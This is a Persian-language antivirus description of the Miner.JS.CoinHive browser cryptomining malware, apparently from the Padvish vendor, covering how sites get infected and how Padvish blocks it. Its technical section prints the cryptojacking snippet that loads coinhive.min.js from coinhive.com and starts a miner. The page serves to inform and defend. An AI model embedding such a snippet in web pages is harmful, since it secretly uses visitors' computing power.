Miner.JS.CoinHive

شرح کلی

نوع: اسکریپت
اسامی بدافزار:
Miner.JS.CoinHive
Trojan.JS.CoinMiner.Hive
درجه تخریب: کم
میزان شیوع: زیاد

وب ماینر(Web Miner) چیست؟

وب ماینر(Web Miner) اسکریپتی است که بر روی هاست یک سایت قرار می‌گیرد و زمانی که کاربر از سایت بازدید می‌کند، اسکریپت روی مرورگر اجرا شده و شروع به استخراج ارز مجازی می‌کند. در واقع شما کامپیوتری دارید که هدف مجرمان سایبری است و از طریق آن ارز مجازی استخراج می‌کنند. سه حالت احتمال دارد که وب سایت آلوده شود:

  1. سایت، هک شده و بدون اطلاع مدیر سایت اسکریپت روی آن قرار گرفته است.
  2. مدیر سایت تعمدا اسکریپت را روی صفحات خود قرار داده است.
  3. یکی از تجهیزات شبکه در میانه راه، اسکریپت را در سایت‌ها درج می‌کند.

بدافزار Coinhive چیست؟

بدافزار Coinhive از دسته اسکریپت‌های استخراج ارز مجازی است و هر کلاینتی که بخواهد به سایت آلوده متصل شود در معرض آلودگی خواهد بود. به این صورت که اسکریپت Miner بر روی سیستم او اجرا می‌شود.

توضیحات فنی

علائم آلودگی به بدافزار Coinhive:
روش استفاده از اسکریپت بدافزار به‌صورت زیر است:

<script src=”https://coinhive.com/lib/coinhive.min.js”></script>
<script>
var miner = new CoinHive.User(‘SITE_KEY’, ‘john-doe’);
miner.start();
</script>

روش مقابله و پاک‌سازی سیستم

دیوار آتش آنتی‌ویروس پادویش از وقوع حملات شبکه‌ای توسط این بدافزار جلوگیری می‌کند. همچنین فایل js بدافزار را شناسایی می‌کند. ازاین‌رو جهت پیشگیری از آلودگی به این بدافزار پیشنهاد می‌شود با نصب پادویش از ورود بدافزار به سیستم خود جلوگیری کنید.

تهدید Miner.JS.CoinHive.a به چه معناست و چگونه با آن برخورد کنیم؟